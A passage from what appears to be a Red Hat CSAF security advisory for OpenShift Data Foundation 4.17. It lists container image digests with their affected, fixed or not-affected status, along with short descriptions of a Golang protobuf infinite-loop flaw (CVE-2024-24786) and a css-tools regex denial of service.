"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "css-tools: Improper Input Validation causes Denial of Service via Regular Expression", }, { cve: "CVE-2024-24786", cwe: { id: "CWE-835", name: "Loop with Unreachable Exit Condition ('Infinite Loop')", }, discovery_date: "2024-03-06T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2268046", }, ], notes: [ { category: "description", text: "A flaw was found in Golang's protobuf module, where the unmarshal function can enter an infinite loop when processing certain invalid inputs. This issue occurs during unmarshaling into a message that includes a google.protobuf.Any or when the UnmarshalOptions.DiscardUnknown option is enabled. This flaw allows an attacker to craft malicious input tailored to trigger the identified flaw in the unmarshal function. By providing carefully constructed invalid inputs, they could potentially cause the function to enter an infinite loop, resulting in a denial of service condition or other unintended behaviors in the affected system.", title: "Vulnerability description", }, { category: "summary", text: "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", 